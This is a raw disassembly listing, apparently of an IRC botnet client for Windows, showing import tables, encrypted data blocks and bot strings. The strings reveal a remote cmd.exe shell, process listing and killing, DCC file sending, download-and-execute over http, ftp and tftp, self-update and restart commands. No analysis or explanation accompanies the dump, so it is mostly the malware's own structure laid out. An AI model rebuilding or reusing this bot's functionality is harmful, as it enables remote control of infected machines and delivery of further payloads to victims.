dword_417084 dd 77E7FF65h ; DATA XREF: sub_401981+2B3�r
dword_417088 dd 77E78B82h ; DATA XREF: sub_401981+37B�r
dword_41708C dd 77E79F93h ; DATA XREF: sub_401244+F2�r
; sub_40332B+1D0�r ...
dword_417090 dd 77E7A099h ; DATA XREF: sub_401244+F9�r
; sub_40332B+1D7�r ...
dword_417094 dd 77E706B7h ; DATA XREF: sub_401244+159�r
; sub_406041+193�r ...
dword_417098 dd 77E61A54h ; DATA XREF: sub_401244+21D�r
; sub_406509+91�r
dword_41709C dd 77E61BE6h ; DATA XREF: sub_401244+3C6�r
; sub_401244+4F4�r ...
dword_4170A0 dd 77E616B4h ; DATA XREF: sub_401244+439�r
; sub_406643+3B�r
dword_4170A4 dd 77E77963h ; DATA XREF: sub_401244+471�r
; sub_401244+4C1�r ...
dword_4170A8 dd 77E70396h ; DATA XREF: sub_401146+11�r
; sub_406E8E+22A�r ...
dword_4170AC dd 77E73628h ; DATA XREF: sub_401146+23�r
; sub_401E38+30�r ...
dword_4170B0 dd 77E79A45h ; DATA XREF: sub_416F4E+1E�r
dword_4170B4 dd 77E7AC37h ; DATA XREF: sub_40A1A7+106�r
dword_4170B8 dd 77E75090h ; DATA XREF: sub_40D74D+87�r
dword_4170BC dd 77E74D76h ; DATA XREF: sub_40D74D+4A�r
dword_4170C0 dd 77E77797h ; DATA XREF: sub_40D74D+33�r
dword_4170C4 dd 77E76C1Ah ; DATA XREF: sub_4083AD+33�r
dword_4170C8 dd 77E686CCh ; DATA XREF: sub_408E8E+4B�r
; sub_408F2E+134�r
dword_4170CC dd 77E6C0E3h ; DATA XREF: sub_408E8E+1A�r
; sub_408F2E+7F�r ...
dword_4170D0 dd 77E7751Ah ; DATA XREF: sub_409226:loc_40928E�r
; sub_4092A4:loc_409307�r ...
dword_4170D4 dd 77E6D75Bh ; DATA XREF: sub_409226+14�r
; sub_4092A4+14�r ...
dword_4170D8 dd 77E802FCh ; DATA XREF: sub_409226+A�r
; sub_4092A4+A�r ...
dword_4170DC dd 77E7176Ch ; DATA XREF: sub_4093B6+51�r
dword_4170E0 dd 77E75CEBh ; DATA XREF: sub_4098F3+A2�r
; sub_4098F3+1B6�r
dword_4170E4 dd 77E79908h ; DATA XREF: sub_409C36+2E�r
dword_4170E8 dd 77E80656h ; DATA XREF: sub_401244+D7�r
; sub_406643+19�r
dword_4170EC dd 77F7E21Fh ; DATA XREF: sub_409C6C+6�r
dword_4170F0 dd 77E79CE3h ; DATA XREF: sub_401981+118�r
dword_4170F4 dd 77E78C17h ; DATA XREF: sub_4167F1+31�r
dword_4170F8 dd 77E7C2C4h ; DATA XREF: sub_4167F1+A8�r
dword_4170FC dd 77E73167h ; DATA XREF: sub_414EF4+5AA�r
; sub_414EF4+5BC�r ...
dword_417100 dd 77E73BEFh ; DATA XREF: sub_414EF4+9C0�r
dword_417104 dd 77E7AC5Eh ; DATA XREF: sub_4148CE+B0�r
dword_417108 dd 77E76432h ; DATA XREF: sub_40D871+29B�r
; sub_414EF4+5CE�r ...
dword_41710C dd 77F7E300h ; DATA XREF: sub_409C7A+6�r
dd 0
dword_417114 dd 77C1C055h ; DATA XREF: sub_416F7A�r
dword_417118 dd 77C423F5h ; DATA XREF: sub_416F80�r
dword_41711C dd 77C219F5h ; DATA XREF: sub_416FA2�r
dword_417120 dd 77C20C5Bh ; DATA XREF: sub_416FA8�r
dword_417124 dd 77C21AD8h ; DATA XREF: .text:loc_416E08�r
dword_417128 dd 77C43150h ; DATA XREF: sub_416E02�r
dword_41712C dd 77C41FA0h ; DATA XREF: sub_416B3A�r
dword_417130 dd 77C33FDEh ; DATA XREF: sub_416DFC�r
dword_417134 dd 77C33FC1h ; DATA XREF: sub_416DF6�r
dword_417138 dd 77C3CE0Ch ; DATA XREF: sub_416DF0�r
dword_41713C dd 77C42D60h ; DATA XREF: sub_416DEA�r
dword_417140 dd 77C1C6F3h ; DATA XREF: sub_416DE4�r
dword_417144 dd 77C435C0h ; DATA XREF: sub_416DDE�r
dword_417148 dd 77C3E5D9h ; DATA XREF: sub_416DD8�r
dword_41714C dd 77C28925h ; DATA XREF: sub_416DD2�r
dword_417150 dd 77C28933h ; DATA XREF: sub_416DCC�r
dword_417154 dd 77C3CCE7h ; DATA XREF: sub_416DC6�r
dword_417158 dd 77C37FEDh ; DATA XREF: sub_416DC0�r
dword_41715C dd 77C33EB0h ; DATA XREF: sub_416DBA�r
dword_417160 dd 77C4B940h ; DATA XREF: sub_416CFE�r
dword_417164 dd 77C4B120h ; DATA XREF: sub_416CF8�r
dword_417168 dd 77C37ADCh ; DATA XREF: sub_416BFC�r
dword_41716C dd 77C2AC58h ; DATA XREF: sub_416BF6�r
dword_417170 dd 77C438C0h ; DATA XREF: sub_416BF0�r
dword_417174 dd 77C3C93Ch ; DATA XREF: sub_416BAE�r
dword_417178 dd 77C43AB0h ; DATA XREF: sub_416BA8�r
dword_41717C dd 77C3E8C0h ; DATA XREF: sub_416BA2�r
dword_417180 dd 77C1BE00h ; DATA XREF: sub_416B9C�r
dword_417184 dd 77C3E140h ; DATA XREF: sub_416B96�r
dword_417188 dd 77C3DFB5h ; DATA XREF: sub_416B90�r
dword_41718C dd 77C3BF06h ; DATA XREF: sub_416B88�r
dword_417190 dd 77C3D8F6h ; DATA XREF: sub_416B82�r
dword_417194 dd 77C3E4B9h ; DATA XREF: sub_416B7C�r
dword_417198 dd 77C3E303h ; DATA XREF: sub_416B76�r
dword_41719C dd 77C41FB0h ; DATA XREF: sub_416B70�r
dword_4171A0 dd 77C43490h ; DATA XREF: sub_416B6A�r
dword_4171A4 dd 77C46553h ; DATA XREF: sub_416B64�r
dword_4171A8 dd 77C3C813h ; DATA XREF: sub_416B5E�r
dword_4171AC dd 77C43900h ; DATA XREF: sub_416B58�r
dword_4171B0 dd 77C42E10h ; DATA XREF: sub_416B52�r
dword_4171B4 dd 77C2AA6Bh ; DATA XREF: sub_416B4C�r
dword_4171B8 dd 77C2AC46h ; DATA XREF: sub_416B46�r
dword_4171BC dd 77C43710h ; DATA XREF: sub_416B40�r
dword_4171C0 dd 77C421A2h ; DATA XREF: sub_416F74�r
align 8
dword_4171C8 dd 7713BC68h ; DATA XREF: sub_416E4E+44�r
align 10h
dword_4171D0 dd 77428B97h ; DATA XREF: sub_401D6E+2D�r
; sub_402A32+79B�r ...
align 8
dword_4171D8 dd 77D4456Bh ; DATA XREF: sub_40A9CF+121�r
dword_4171DC dd 77D79D1Ch ; DATA XREF: sub_414EF4+76D�r
dword_4171E0 dd 77D4C96Ah ; DATA XREF: sub_406D90+B0�r
; sub_408F2E+1D1�r ...
dword_4171E4 dd 77D5C13Ah ; DATA XREF: sub_40A9CF+128�r
; sub_415B60+84�r
dword_4171E8 dd 77D4BDCAh ; DATA XREF: sub_40D734+B�r
dword_4171EC dd 77D4702Fh ; DATA XREF: sub_40D74D+6C�r
; sub_40D74D+7E�r
dd 0
dword_4171F4 dd 71AB3E5Dh ; DATA XREF: sub_404FE7+C5�r
; sub_4050EA+106�r ...
dword_4171F8 dd 71AB1B7Bh ; DATA XREF: sub_416E30�r
dword_4171FC dd 71AB868Dh ; DATA XREF: sub_4048EF+11E�r
; sub_4048EF+39F�r
dword_417200 dd 71AB8629h ; DATA XREF: sub_40538D+8�r
; sub_412A3A+178�r ...
dword_417204 dd 71AB3F8Dh ; DATA XREF: sub_4046BC+114�r
; sub_4055E5+7B�r ...
dword_417208 dd 71AB3ECEh ; DATA XREF: sub_4046BC+129�r
; sub_411DC5+DF�r ...
dword_41720C dd 71AB1AF4h ; DATA XREF: sub_4053BF+F�r
; sub_40A9CF+1A74�r
dword_417210 dd 71ABF628h ; DATA XREF: sub_4044F7+21�r
; sub_4045B2+21�r
dword_417214 dd 71AB155Ah ; DATA XREF: sub_404457+1C�r
; sub_40447B+10�r
dword_417218 dd 71AB3C22h ; DATA XREF: sub_40432E+A�r
; sub_4046BC+CE�r ...
dword_41721C dd 71AB401Ch ; DATA XREF: sub_4038BA+72�r
; sub_40732D+1A8�r ...
dword_417220 dd 71ABD755h ; DATA XREF: sub_4038BA+D0�r
; sub_4038BA+171�r ...
dword_417224 dd 71AB1740h ; DATA XREF: sub_4038BA+E5�r
; sub_4038BA+186�r ...
dword_417228 dd 71ABD850h ; DATA XREF: sub_4038BA+28D�r
dword_41722C dd 71AB1890h ; DATA XREF: sub_4048EF+265�r
; sub_404E1C+E0�r ...
dword_417230 dd 71AB1A6Dh ; DATA XREF: sub_4053B1+6�r
; sub_40A9CF+1A80�r ...
dword_417234 dd 71AB350Dh ; DATA XREF: sub_403588+23�r
; sub_403588+4A�r ...
dword_417238 dd 71AB1746h ; DATA XREF: sub_403588+BA�r
; sub_403588+1FE�r ...
dword_41723C dd 71AB2BBFh ; DATA XREF: sub_403588+151�r
; sub_4055E5+F3�r ...
dword_417240 dd 71AB157Eh ; DATA XREF: sub_4020C2+B9�r
; sub_40449C+21�r ...
dword_417244 dd 71AB12F8h ; DATA XREF: sub_4020C2+1FA�r
; sub_4055E5+DD�r ...
dword_417248 dd 71AB5690h ; DATA XREF: sub_401E38+106�r
; sub_4053DC+27�r ...
dword_41724C dd 71AB12A7h ; DATA XREF: sub_401E38+141�r
; sub_4020C2+201�r
dword_417250 dd 71AB1ED3h ; DATA XREF: sub_4055E5+7F2�r
; sub_411DC5+372�r ...
dword_417254 dd 71AB1836h ; DATA XREF: sub_406E8E+2AB�r
; sub_407148+183�r ...
dword_417258 dd 71AB1444h ; DATA XREF: sub_411DC5+2A1�r
dword_41725C dd 71AB14DCh ; DATA XREF: sub_415F69+157�r
dword_417260 dd 71AB32CAh ; DATA XREF: sub_415F69+81�r
dword_417264 dd 71AB41DAh ; DATA XREF: sub_4167F1+201�r
dword_417268 dd 71AB5DE2h ; DATA XREF: sub_4046BC+14D�r
align 10h
flt_417270 dd 1.0e3 ; DATA XREF: sub_401E38+207�r
; sub_401E38+22F�r ...
flt_417274 dd 1.024e3 ; DATA XREF: sub_408B30+2A2�r
dword_417278 dd 0FFFFFFFFh, 409449h, 40945Fh, 0 ; DATA XREF: sub_4093B6+5�o
dword_417288 dd 0FFFFFFFFh, 409572h, 40958Ah, 0 ; DATA XREF: sub_4094E6+5�o
dword_417298 dd 0FFFFFFFFh, 416AE7h, 416AFDh, 0 ; DATA XREF: sub_4167F1+5�o
dd offset loc_416AC5, offset loc_416ADB, offset dword_4172F0
off_4172B4 dd offset sub_416F05, offset dword_417338, offset sub_416F86
; DATA XREF: sub_416ED3+12�o
; .text:00416F3A�o ...
dd offset dword_41DDE0, 2 dup(0)
dd 0FFFFFFFFh, 2 dup(0)
dd offset off_4172B4+0Ch
dd 3 dup(0)
dd 1, 4172D8h
dword_4172F0 dd 3 dup(0) ; DATA XREF: .rdata:004172A8�o
dd 41DDE0h, 4172E0h, 0
off_417308 dd offset aRa, 2 dup(0) ; DATA XREF: .rdata:00417320�o
; "¼rA"
dd 0FFFFFFFFh, 2 dup(0)
dd offset off_417308
align 10h
dd 1, 417320h
dword_417338 dd 3 dup(0) ; DATA XREF: .rdata:off_4172B4�o
dd 41DE00h, 417328h, 0
dword_417350 dd 19930520h, 4, 417370h, 5 dup(0) ; DATA XREF: .text:loc_416FDD�o
dd 0FFFFFFFFh, 416FB0h, 0
dd 416FBCh, 1, 416FC5h, 2, 416FD1h, 0
dd offset dword_41DDE0, 0
dd 0FFFFFFFFh, 0
dd 10h, 416F21h, 0
dword_4173B0 dd 1, 417390h ; DATA XREF: .rdata:004173C4�o
dword_4173B8 dd 0 ; DATA XREF: sub_416EAF+19�o
dd offset sub_416F4E, 0
dd offset dword_4173B0
dd 1757Ch, 2 dup(0)
dd 17876h, 17114h, 1765Ch, 2 dup(0)
dd 1788Eh, 171F4h, 17498h, 2 dup(0)
dd 17C70h, 17030h, 17640h, 2 dup(0)
dd 17CE6h, 171D8h, 17468h, 2 dup(0)
dd 17DBAh, 17000h, 17638h, 2 dup(0)
dd 17DD8h, 171D0h, 17630h, 2 dup(0)
dd 17E3Eh, 171C8h, 0A1h dup(0)
dd 747302BAh, 79706372h, 2BE0000h, 6C727473h, 6E65h, 616D0291h
dd 636F6C6Ch, 25E0000h, 65657266h, 2970000h, 636D656Dh
dd 7970h, 747302C1h, 70636E72h, 2B20079h, 69727073h, 66746Eh
dd 6C630243h, 6B636Fh, 656D0299h, 7465736Dh, 2B60000h
dd 63727473h, 7461h, 74660264h, 6C6C65h, 77660266h, 65746972h
dd 24C0000h, 6F6C6366h, 6573h, 6F660257h, 6E6570h, 7266025Dh
dd 646165h, 73660262h, 6B6565h, 7461023Dh, 696Fh, 737302B5h
dd 666E6163h, 2C50000h, 73727473h, 7274h, 735F01AEh, 6972706Eh
dd 66746Eh, 747302C0h, 6D636E72h, 2A70070h, 6C616572h
dd 636F6Ch, 78650249h, 7469h, 665F00F1h, 6C6F74h, 65630241h
dd 6C69h, 655F00CAh, 70656378h, 61685F74h, 656C646Eh, 3372h
dd 625F00A6h, 6E696765h, 65726874h, 78656461h, 2DC0000h
dd 72707376h, 66746E69h, 100000h, 40333F3Fh, 50584159h
dd 5A405841h, 0F0000h, 40323F3Fh, 41504159h, 5A404958h
dd 29E0000h, 6E697270h, 6674h, 747302B8h, 706D6372h, 2D30000h
dd 6F6C6F74h, 726577h, 656D0296h, 706D636Dh, 1E10000h
dd 6E73765Fh, 6E697270h, 6674h, 725F019Bh, 6C746Fh, 725F019Ch
dd 72746Fh, 656D0298h, 766F6D6Dh, 490065h
a__cxxframehand db '__CxxFrameHandler',0
aMsvcrt_dll db 'MSVCRT.dll',0
align 2
db '(',0
aWsaioctl db 'WSAIoctl',0
align 2
aWs2_32_dll_0 db 'WS2_32.dll',0
align 2
db '|',0
aDeletefilea db 'DeleteFileA',0
db 0Eh
db 3, 53h, 65h
aTfileattribute db 'tFileAttributesA',0
align 2
a_ db '.',0
aClosehandle db 'CloseHandle',0
db 51h ; Q
db 3, 54h, 65h
aRminateprocess db 'rminateProcess',0
align 10h
db 49h ; I
db 3, 53h, 6Ch
db 65h ; e
db 65h, 70h, 0
db 0AEh ; ®
db 2, 52h, 65h
aAdprocessmemor db 'adProcessMemory',0
dd 704F027Ch, 72506E65h, 7365636Fh, 1750073h
aGetmodulefil_0 db 'GetModuleFileNameA',0
align 10h
db 77h ; w
db 1, 47h, 65h
aTmodulehandlea db 'tModuleHandleA',0
align 4
db 3Bh ; ;
db 1, 47h, 65h
aTcurrentproces db 'tCurrentProcessId',0
dw 2ABh
aReadfile db 'ReadFile',0
align 2
dw 152h
aGetexitcodepro db 'GetExitCodeProcess',0
align 4
db 87h ; ‡
db 2, 50h, 65h
aEknamedpipe db 'ekNamedPipe',0
db '`',0
aCreateprocessa db 'CreateProcessA',0
align 2
aM db 'Œ',0
aDuplicatehandl db 'DuplicateHandle',0
db 3Ah ; :
db 1, 47h, 65h
aTcurrentproc_0 db 'tCurrentProcess',0
a__0 db '_',0
aCreatepipe db 'CreatePipe',0
align 2
dw 2D0h
aSearchpatha db 'SearchPathA',0
db 97h ; —
db 3, 57h, 72h
aItefile db 'iteFile',0
db 69h ; i
db 1, 47h, 65h
aTlasterror db 'tLastError',0
align 4
db '=',0
aCopyfilea db 'CopyFileA',0
aP db '¯',0
aExitprocess db 'ExitProcess',0
dw 198h
aGetprocaddress db 'GetProcAddress',0
align 4
db 48h ; H
db 2, 4Ch, 6Fh
aAdlibrarya db 'adLibraryA',0
align 4
db 0B9h ; ¹
db 1, 47h, 65h
aTsystemdirecto db 'tSystemDirectoryA',0
dw 314h
aSetfiletime db 'SetFileTime',0
db 5Dh ; ]
db 1, 47h, 65h
aTfiletime db 'tFileTime',0
aM_0 db 'M',0
aCreatefilea db 'CreateFileA',0
db 0E9h ; é
db 1, 47h, 65h
aTwindowsdirect db 'tWindowsDirectoryA',0
align 10h
db 0BFh ; ¿
db 3, 6Ch, 73h
aTrlena db 'trlenA',0
align 4
db 0FFh
db 2, 53h, 65h
aTcurrentdirect db 'tCurrentDirectoryA',0
align 4
dd 6547016Ch, 636F4C74h, 49656C61h, 416F666Eh, 1DF0000h
dd 56746547h, 69737265h, 78456E6Fh, 10C0041h, 43746547h
dd 75706D6Fh, 4E726574h, 41656D61h, 1FA0000h
aGlobalmemoryst db 'GlobalMemoryStatus',0
align 10h
db 46h ; F
db 1, 47h, 65h
aTdiskfreespace db 'tDiskFreeSpaceExA',0
dw 14Bh
aGetdrivetypea db 'GetDriveTypeA',0
dw 1D5h
aGettickcount db 'GetTickCount',0
align 2
dw 29Ah
aQueryperforman db 'QueryPerformanceFrequency',0
dw 299h
aQueryperform_0 db 'QueryPerformanceCounter',0
dd 73490226h, 43646142h, 5065646Fh, 7274h, 65540352h, 6E696D72h
dd 54657461h, 61657268h, 2190064h
aInitializecr_0 db 'InitializeCriticalSection',0
aP_0 db '',0
aEntercriticals db 'EnterCriticalSection',0
align 2
dw 247h
aLeavecriticals db 'LeaveCriticalSection',0
align 2
aI db 'i',0
aCreatethread db 'CreateThread',0
align 2
dw 365h
aUnmapviewoffil db 'UnmapViewOfFile',0
db 5Eh ; ^
db 2, 4Dh, 61h
aPviewoffile db 'pViewOfFile',0
aN db 'N',0
aCreatefilemapp db 'CreateFileMappingA',0
align 2
dw 3B3h
aLstrcmpa db 'lstrcmpA',0
align 2
dw 150h
aGetenvironment db 'GetEnvironmentVariableA',0
db 0BCh ; ¼
db 3, 6Ch, 73h
aTrcpyna db 'trcpynA',0
db 0B9h ; ¹
db 3, 6Ch, 73h
aTrcpya db 'trcpyA',0
align 10h
aZ db 'Z',0
aCreatemutexa db 'CreateMutexA',0
align 10h
db 0Ah
db 3, 53h, 65h
aTerrormode db 'tErrorMode',0
align 10h
aKernel32_dll_0 db 'KERNEL32.dll',0
align 2
dw 2D5h
aWsprintfa db 'wsprintfA',0
dw 177h
aGetwindowtexta db 'GetWindowTextA',0
align 4
db 17h
db 1, 47h, 65h
aTforegroundwin db 'tForegroundWindow',0
aU_0 db 'ã',0
aFindwindowa db 'FindWindowA',0
db 3Ah ; :
db 2, 53h, 65h
aNdmessagea db 'ndMessageA',0
align 10h
db 97h ; —
db 1, 49h, 73h
aCharalphanumer db 'CharAlphaNumericA',0
aUser32_dll db 'USER32.dll',0
align 2
dw 1C9h
aRegclosekey db 'RegCloseKey',0
dd 655201D2h, 6C654467h, 56657465h, 65756C61h, 1D90041h
dd 45676552h, 566D756Eh, 65756C61h, 1E20041h, 4F676552h
dd 4B6E6570h, 78457965h, 1EC0041h, 51676552h, 79726575h
dd 756C6156h, 41784565h, 1F90000h, 53676552h, 61567465h
dd 4565756Ch, 4178h, 655201CDh, 65724367h, 4B657461h, 78457965h
dd 1230041h, 55746547h, 4E726573h, 41656D61h, 0A00000h
aCryptreleaseco db 'CryptReleaseContext',0
aC db '–',0
aCryptgenrandom db 'CryptGenRandom',0
align 2
aE db '…',0
aCryptacquireco db 'CryptAcquireContextA',0
align 2
aAdvapi32_dll db 'ADVAPI32.dll',0
align 4
db 7
db 1, 53h, 68h
aEllexecutea db 'ellExecuteA',0
aShell32_dll db 'SHELL32.dll',0
db 0BDh ; ½
db 1, 5Fh, 73h
aTrcmpi db 'trcmpi',0
align 10h
db 34h ; 4
db 1, 5Fh, 69h
db 74h ; t
db 6Fh, 61h, 0
db 0C5h ; Å
db 1, 5Fh, 73h
aTrnicmp db 'trnicmp',0
aA_1 db 'A',0
a_cxxthrowexcep db '_CxxThrowException',0
align 2
dw 0Eh
a??1type_info@@ db '??1type_info@@UAE@XZ',0
align 2
dw 252h
aLocalfree db 'LocalFree',0
aOleaut32_dll db 'OLEAUT32.dll',0
align 200h
_rdata ends
; Section 3. (virtual address 00018000)
; Virtual size : 00008000 ( 32768.)
; Section size in file : 00008000 ( 32768.)
; Offset to raw data for section: 00018000
; Flags E0000060: Text Data Executable Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Write/Execute
_data segment para public 'CODE' use32
assume cs:_data
;org 418000h
assume es:nothing, ss:nothing, ds:_data, fs:nothing, gs:nothing
off_418000 dd offset dword_418098 ; DATA XREF: sub_401000+1D�r
; sub_401000+2E�r
dd offset dword_41805C
dd offset dword_418040
dd offset dword_418014
dd 0
dword_418014 dd 0E4E4BFB1h, 0FD92B7D8h, 0B6ACE2BDh, 0DEB4A195h, 0DFC5928Ch
; DATA XREF: .data:0041800C�o
dd 0CAABA9F1h, 0BDB1D394h, 0DD98A78Fh, 0D1C4AABEh, 2 dup(0)
dword_418040 dd 0C4D189B1h, 0DBBC9BEAh, 0B0B7DD94h, 0DE84BA89h, 0FFEB9284h
; DATA XREF: .data:00418008�o
dd 0BFD1h, 0
dword_41805C dd 0C4D189B1h, 0DBBC9BEAh, 0B0B7DD94h, 0DE84BA89h, 0E7EB9284h
; DATA XREF: .data:00418004�o
dd 0D1AA94F4h, 9082E3BFh, 0D485A78Eh, 0D5E1928Ch, 0D1A789EFh
dd 0A68CCCA6h, 0C3928695h, 0D5D48F94h, 0EEh, 0
dword_418098 dd 0C4D189B1h, 0DBBC9BEAh, 0B0B7DD94h, 0DE84BA89h, 0E7EB9284h
; DATA XREF: .data:off_418000�o
dd 0D1AA94F4h, 9082E3BFh, 0D485A78Eh, 0D5E1928Ch, 0D1A789EFh
dd 0A68CCCA6h, 95h, 0
dword_4180CC dd 2343003h, 2037525h, 746F6220h, 20297328h, 6E756F66h
; DATA XREF: sub_401244+52D�o
dd 69772064h, 73206874h, 6E697274h, 30032067h, 73250234h
dd 2E0203h
dword_4180F8 dd 62206F4Eh, 2073746Fh, 6E756F66h, 69772064h, 73206874h
; DATA XREF: sub_401244+50A�o
dd 6E697274h, 30032067h, 73250234h, 2E0203h
dword_41811C dd 6E756F66h, 74732064h, 676E6972h, 34300320h, 3732502h
; DATA XREF: sub_401244+412�o
dd 6E692002h, 20732520h, 34300328h, 3692502h, 2902h
dword_418144 dd 3430032Dh, 3752502h, 4C202D02h, 69747369h, 6220676Eh
; DATA XREF: sub_401244+45�o
dd 2073746Fh, 68746977h, 72747320h, 20676E69h, 2343003h
dd 2037325h, 3Ah
dword_418174 dd 62207325h, 2073746Fh, 68746977h, 72747320h, 20676E69h
; DATA XREF: sub_4017AA+93�o
dd 2343003h, 2037325h, 0
aKilling db 'Killing',0 ; DATA XREF: sub_4017AA:loc_401830�o
aListing db 'Listing',0 ; DATA XREF: sub_4017AA+7D�o
dword_4181A4 dd 303h ; DATA XREF: sub_4018AF:loc_401942�o
aCmd_exeProcess db 'Cmd.exe process has terminated.',0 ; DATA XREF: sub_401981+2C9�o
aCouldNotReadDa db 'Could not read data from process.',0 ; DATA XREF: sub_401981+27E�o
align 4
aCmd_exe db 'cmd.exe',0 ; DATA XREF: sub_401981+48�o
aErrorWhileExec db 'Error while executing command.',0 ; DATA XREF: sub_401D6E+B9�o
align 4
asc_418214 db 0Dh,0Ah,0 ; DATA XREF: sub_401D6E:loc_401E0B�o
; sub_403DF3+18C�o ...
align 4
aRemoteCmdThrea db 'Remote cmd thread',0 ; DATA XREF: sub_401D6E+7E�o
align 4
aOpen db 'open',0 ; DATA XREF: sub_401D6E+26�o
; sub_402A32+794�o ...
align 4
dword_418234 dd 65636552h, 64657669h, 34300320h, 3732502h, 72662002h
; DATA XREF: sub_401E38+248�o
dd 3206D6Fh, 25023430h, 20020373h, 3206E69h, 25023430h
dd 66322E30h, 65730203h, 69772063h, 3206874h, 25023430h
dd 66332E30h, 424B0203h, 6365732Fh, 0
dword_418280 dd 3430032Dh, 3752502h, 52202D02h, 69656365h, 676E6976h
; DATA XREF: sub_401E38+CC�o
dd 34300320h, 3732502h, 72662002h, 3206D6Fh, 25023430h
dd 20373h
dword_4182AC dd 6277h ; DATA XREF: sub_401E38+36�o
; sub_402698:loc_40288E�o ...
dword_4182B0 dd 746E6553h, 34300320h, 3732502h, 6F742002h, 34300320h
; DATA XREF: sub_4020C2+3E1�o
dd 3732502h, 6E692002h, 34300320h, 2E302502h, 2036632h
dd 20636573h, 68746977h, 34300320h, 2E302502h, 2036633h
dd 732F424Bh, 6365h
dword_4182F4 dd 6E617254h, 72656673h, 20666F20h, 2343003h, 2037325h
; DATA XREF: sub_4020C2+313�o
dd 206F7420h, 2343003h, 2037325h, 6E616320h, 6C6C6563h
dd 6465h
dword_418320 dd 3430032Dh, 3752502h, 53202D02h, 69646E65h, 320676Eh
; DATA XREF: sub_4020C2+28E�o
dd 25023430h, 20020373h, 3206F74h, 25023430h, 20373h
dword_418348 dd 43434401h, 4E455320h, 25222044h, 25202273h, 73252064h
; DATA XREF: sub_4020C2+20F�o
dd 1642520h, 0
aDccSendSS db 'DCC Send %s (%s)',0 ; DATA XREF: sub_4020C2+1D2�o
align 4
aRb db 'rb',0 ; DATA XREF: sub_4020C2:loc_40220F�o
; sub_406AE7+63�o ...
align 4
dword_41837C dd 65636552h, 6E697669h, 30032067h, 73250234h, 66200203h
; DATA XREF: sub_4024F3+101�o
dd 206D6F72h, 2343003h, 2037325h, 0
dword_4183A0 dd 646E6553h, 20676E69h, 2343003h, 2037325h, 206F7420h
; DATA XREF: sub_40260D+72�o
dd 2343003h, 2037325h, 0
aContentLengthU db 'Content-Length: %u',0Dh,0Ah,0 ; DATA XREF: sub_402698+155�o
align 4
aContentLength db 'Content-Length: ',0 ; DATA XREF: sub_402698+104�o
align 4
asc_4183EC db 0Dh,0Ah ; DATA XREF: sub_402698:loc_402758�o
db 0Dh,0Ah,0
align 4
aGetSHttp1_0Hos db 'GET /%s HTTP/1.0',0Dh,0Ah ; DATA XREF: sub_402698+3A�o
; sub_4088FC+E9�o
db 'Host: %s',0Dh,0Ah
db 0Dh,0Ah,0
align 4
dword_418414 dd 3430032Dh, 3752502h, 45202D02h, 726F7272h, 69687720h
; DATA XREF: sub_402A32+7F6�o
dd 6420656Ch, 6C6E776Fh, 6964616Fh, 320676Eh, 25023430h
dd 2E020373h, 0
dword_418444 dd 3430032Dh, 3752502h, 55202D02h, 6C62616Eh, 6F742065h
; DATA XREF: sub_402A32+7D1�o
dd 61747320h, 3207472h, 25023430h, 2E020373h, 0
dword_41846C dd 3430032Dh, 3752502h, 53202D02h, 65636375h, 75667373h
; DATA XREF: sub_402A32+738�o
dd 20796C6Ch, 6E776F64h, 64616F6Ch, 3206465h, 25023430h
dd 20020373h, 68746977h, 34300320h, 2E302502h, 2036632h
dd 732F424Bh, 73256365h, 2Eh
dword_4184B4 dd 7865202Ch, 74756365h, 676E69h ; DATA XREF: sub_402A32+6B0�o
dword_4184C0 dd 7075202Ch, 69746164h, 676Eh ; DATA XREF: sub_402A32+699�o
unk_4184CC db 2Dh ; - ; DATA XREF: sub_402A32+50E�o
db 3, 30h, 34h
db 2
db 25h, 75h, 3
db 2
aNoFileToDownlo db '- No file to download specified.',0
align 4
asc_4184F8: ; DATA XREF: sub_402A32:loc_402F16�o
unicode 0, </>,0
asc_4184FC: ; DATA XREF: sub_402A32+45F�o
; sub_414EF4+644�o ...
unicode 0, <:>,0
unk_418500 db 2Dh ; - ; DATA XREF: sub_402A32+3E4�o
db 3, 30h, 34h
db 2
db 25h, 75h, 3
db 2
aUnsupportedPro db '- Unsupported protocol specified.',0
align 4
a69 db '69',0 ; DATA XREF: sub_402A32+3A8�o
align 10h
aTftp db 'tftp://',0 ; DATA XREF: sub_402A32+387�o
aAnonymous db 'anonymous',0 ; DATA XREF: sub_402A32+35A�o
; sub_402A32+36D�o
align 4
a21 db '21',0 ; DATA XREF: sub_402A32+328�o
align 4
aFtp db 'ftp://',0 ; DATA XREF: sub_402A32+307�o
align 10h
a80 db '80',0 ; DATA XREF: sub_402A32+2CE�o
; sub_4043E9+27�o ...
align 4
aHttp db 'http://',0 ; DATA XREF: sub_402A32+2AD�o
dword_41855C dd 3430032Dh, 3752502h, 43202D02h, 6F6E6E61h, 65722074h
; DATA XREF: sub_402A32+135�o
dd 73206461h, 6372756Fh, 69662065h, 320656Ch, 25023430h
dd 2E020373h, 0
dword_41858C dd 3430032Dh, 3752502h, 43202D02h, 6F6E6E61h, 72772074h
; DATA XREF: sub_402A32+110�o
dd 20657469h, 64206F74h, 69747365h, 6974616Eh, 66206E6Fh
dd 20656C69h, 2343003h, 2037325h, 2Eh
dword_4185C4 dd 656C6966h, 2F2F3Ah ; DATA XREF: sub_402A32+C0�o
dword_4185CC dd 3430032Dh, 3752502h, 44202D02h, 6C6E776Fh, 6964616Fh
; DATA XREF: sub_402A32+AA�o
dd 320676Eh, 25023430h, 20020373h, 3206F74h, 25023430h
dd 2E020373h, 0
dword_4185FC dd 6E776F44h, 64616F6Ch, 20676E69h, 2343003h, 2037325h
; DATA XREF: sub_403260+B2�o
dd 206F7420h, 2343003h, 2037325h, 0
dword_418620 dd 6578652Eh, 0 ; DATA XREF: sub_403260+43�o
; sub_412720+51�o
aQuitRestarting db 'QUIT :restarting',0 ; DATA XREF: sub_40332B:loc_403538�o
; sub_40332B:loc_403545�o ...
align 4
aQuitExitting db 'QUIT :exitting',0 ; DATA XREF: sub_40332B+200�o
; sub_40A9CF:loc_40BD52�o
align 4
dword_41864C dd 3430032Dh, 62656402h, 2036775h ; DATA XREF: sub_40332B+19C�o
aModuleSReporte db '- Module "%s" reported a crash in "%s": N=%u EAX=%08X EBX=%08X EC'
db 'X=%08X EDX=%08X ESI=%08X EDI=%08X EBP=%08X ESP=%08X EIP=%08X EFLA'
db 'GS=%08X. Code: %08X (%s). %s...',0
align 4
aContinuing db 'Continuing',0 ; DATA XREF: sub_40332B:loc_40342A�o
align 4
aRestarting db 'Restarting',0 ; DATA XREF: sub_40332B+F3�o
align 4
aException_flt db 'EXCEPTION_FLT',0 ; DATA XREF: sub_40332B:loc_40340C�o
align 4
